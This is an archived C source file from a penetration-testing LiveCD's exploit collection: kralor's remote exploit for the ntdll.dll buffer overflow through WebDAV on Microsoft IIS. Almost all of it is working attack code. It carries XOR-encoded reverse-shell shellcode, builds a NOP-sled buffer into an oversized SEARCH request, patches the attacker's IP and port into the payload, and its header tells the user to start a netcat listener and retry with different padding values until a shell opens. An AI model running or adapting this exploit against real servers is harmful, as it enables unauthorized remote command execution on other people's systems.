home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / iis / iis-webdav-wbr.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  9KB  |  246 lines

  1. /*******************************************************************/
  2. /*     [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]     */
  3. /* --------------------------------------------------------------- */
  4. /*     this is the exploit for ntdll.dll through WebDAV.           */
  5. /*     run a netcat ex: nc -L -vv -p 666                           */
  6. /*     wb server.com your_ip 666 0                                 */
  7. /*     the shellcode is a reverse remote shell                     */
  8. /*     you need to pad a bit.. the best way I think is launching   */
  9. /*     the exploit with pad = 0 and after that, the server will be */
  10. /*     down for a couple of seconds, now retry with pad at 1       */
  11. /*     and so on..pad 2.. pad 3.. if you haven't the shell after   */
  12. /*     something like pad at 10 I think you better to restart from */
  13. /*     pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
  14. /*     on all the others servers it was at 2,3,4, etc..sometimes   */
  15. /*     you can have the force with you, and get the shell in 1 try */
  16. /*     sometimes you need to pad more than 10 times ;)             */
  17. /*     the shellcode was coded by myself, it is SEH + ScanMem to   */
  18. /*     find the famous offsets (GetProcAddress)..                  */
  19. /*     I know I code like a pig, my english sucks, and my tech too */
  20. /*     it is my first exploit..and my first shellcode..sorry :P    */
  21. /*     if you have comments feel free to mail me at:               */
  22. /*     mailto: kralor@coromputer.net                               */
  23. /*     or visit us at www.coromputer.net . You can speak with us   */
  24. /*     at IRC undernet channel #coromputer                         */
  25. /*     ok now the greetz:                                          */
  26. /*     [El0d1e] to help me find some information about the bug :)  */
  27. /*     tuck_ to support me ;)                                      */
  28. /*     and all my friends in coromputer crew! hein les poulets! =) */
  29. /*                                                                 */
  30. /*     Tested by Rafael [RaFa] Nunez  rnunez@scientech.com.ve      */
  31. /*                                                                 */
  32. /*     (take off the WSAStartup, change the closesocket, change    */
  33. /*       headers and it will run on linux boxes ;pPpPpP ).         */
  34. /*                                                                 */
  35. /*******************************************************************/
  36.  
  37.  
  38. #include <winsock.h>
  39. #include <windows.h>
  40. #include <stdio.h>
  41.  
  42. #pragma comment (lib,"ws2_32")
  43.  
  44. char shellc0de[] =
  45.         "\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc"
  46.         "\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8"
  47.         "\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33"
  48.         "\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6"
  49.         "\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08"
  50.         "\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64"
  51.         "\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81"
  52.         "\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8"
  53.         "\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b"
  54.         "\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f"
  55.         "\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24"
  56.         "\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd"
  57.         "\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83"
  58.         "\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00"
  59.         "\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d"
  60.         "\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51"
  61.         "\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c"
  62.         "\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56"
  63.         "\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00"
  64.         "\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d"
  65.         "\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d"
  66.         "\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8"
  67.         "\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a"
  68.         "\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20"
  69.         "\xff\xd0"
  70.         "CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00"
  71.         "connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"
  72.         "cmd" // don't change anything..
  73.         "\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..
  74.         "\x00\x00\xe8\x77"
  75.         "\x00\x00\xf0\x77"
  76.         "\x00\x00\xe4\x77"
  77.         "\x00\x88\x3e\x04" // win2k3
  78.         "\x00\x00\xf7\xbf" // win9x =P
  79.         "\xff\xff\xff\xff";
  80.  
  81. int test_host(char *host)
  82. {
  83.       char search[100]="";
  84.       int sock;
  85.       struct hostent *heh;
  86.       struct sockaddr_in hmm;
  87.       char buf[100] ="";
  88.  
  89.       if(strlen(host)>60) {
  90.             printf("error: victim host too long.\r\n");
  91.             return 1;
  92.       }
  93.  
  94.   if ((heh = gethostbyname(host))==0){
  95.     printf("error: can't resolve '%s'",host);
  96.     return 1;
  97.   }
  98.  
  99.   sprintf(search,"SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n",host);
  100.   hmm.sin_port = htons(80);
  101.   hmm.sin_family = AF_INET;
  102.   hmm.sin_addr = *((struct in_addr *)heh->h_addr);
  103.  
  104.   if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  105.     printf("error: can't create socket");
  106.     return 1;
  107.   }
  108.  
  109.   printf("Checking WebDav on '%s' ... ",host);
  110.  
  111.   if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){
  112.     printf("CONNECTING_ERROR\r\n");
  113.     return 1;
  114.   }
  115.       send(sock,search,strlen(search),0);
  116.       recv(sock,buf,sizeof(buf),0);
  117. if(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')
  118.       return 0;
  119.       printf("NOT FOUND\r\n");
  120.       return 1;
  121. }
  122.  
  123. void help(char *program)
  124. {
  125.       printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n",program);
  126.       return;
  127. }
  128.  
  129. void banner(void)
  130. {
  131.       printf("\r\n\t  [Crpt] ntdll.dll exploit trough WebDAV by kralor[Crpt]\r\n");
  132.       printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
  133.       return;
  134. }
  135.  
  136. void main(int argc, char *argv[])
  137. {
  138.       WSADATA wsaData;
  139.       unsigned short port=0;
  140.       char *port_to_shell="", *ip1="", data[50]="";
  141.       unsigned int i,j;
  142.       unsigned int ip = 0 ;
  143.       int s, PAD=0x10;
  144.       struct hostent *he;
  145.       struct sockaddr_in crpt;
  146.       char buffer[65536] ="";
  147.       char request[80000];    // huuuh, what a mess! :)
  148.       char content[] =
  149.            "<?xml version=\"1.0\"?>\r\n"
  150.            "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
  151.            "<g:sql>\r\n"
  152.            "Select \"DAV:displayname\" from scope()\r\n"
  153.            "</g:sql>\r\n"
  154.            "</g:searchrequest>\r\n";
  155.  
  156.       banner();
  157.       if((argc<4)||(argc>5)) {
  158.             help(argv[0]);
  159.             return;
  160.       }
  161.  
  162. if(WSAStartup(0x0101,&wsaData)!=0) {
  163.       printf("error starting winsock..");
  164.       return;
  165.       }
  166.  
  167. if(test_host(argv[1]))
  168.       return;
  169.  
  170. if(argc==5)
  171.       PAD+=atoi(argv[4]);
  172.  
  173. printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n",PAD,PAD);
  174.  
  175.       ip = inet_addr(argv[2]); ip1 = (char*)&ip;
  176.  
  177. shellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];
  178. shellc0de[451]=ip1[3];
  179.  
  180.       port = htons(atoi(argv[3]));
  181.       port_to_shell = (char *) &port;
  182.       shellc0de[446]=port_to_shell[0];
  183.       shellc0de[447]=port_to_shell[1];
  184.  
  185. // we xor the shellcode [xored by 0x95 to avoid bad chars]
  186. _asm {
  187.   lea eax, shellc0de
  188.   add eax, 0x34
  189.   xor ecx, ecx
  190.   mov cx, 0x1b0
  191.   wah:
  192.     xor byte ptr[eax], 0x95
  193.     inc eax
  194.   loop wah
  195. }
  196.  
  197.   if ((he = gethostbyname(argv[1]))==0){
  198.     printf("error: can't resolve '%s'",argv[1]);
  199.     return;
  200.   }
  201.  
  202.   crpt.sin_port = htons(80);
  203.   crpt.sin_family = AF_INET;
  204.   crpt.sin_addr = *((struct in_addr *)he->h_addr);
  205.  
  206.   if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  207.     printf("error: can't create socket");
  208.     return;
  209.   }
  210.  
  211.   printf("Connecting... ");
  212.  
  213.   if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){
  214.     printf("ERROR\r\n");
  215.     return;
  216.   }
  217. // No Operation.
  218. for(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);
  219. // fill the buffer with the shellcode
  220. for(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);
  221. // well..it is not necessary..
  222. for(i=0;i<2500;buffer[i]=PAD,i++);
  223.  
  224. /* we can simply put our ret in this 2 offsets.. */
  225. //buffer[2086]=PAD;
  226. //buffer[2085]=PAD;
  227.  
  228.       buffer[sizeof(buffer)]=0x00;
  229.       memset(request,0,sizeof(request));
  230.       memset(data,0,sizeof(data));
  231.       sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]);
  232.       sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
  233.       printf("CONNECTED\r\nSending evil request... ");
  234.       send(s,request,strlen(request),0);
  235.       send(s,content,strlen(content),0);
  236.       printf("SENT\r\n");
  237.       recv(s,data,sizeof(data),0);
  238.       if(data[0]!=0x00) {
  239.       printf("Server seems to be patched.\r\n");
  240.       printf("data: %s\r\n",data);
  241.       } else
  242.       printf("Now if you are lucky you will get a shell.\r\n");
  243.       closesocket(s);
  244.       return;
  245. }
  246.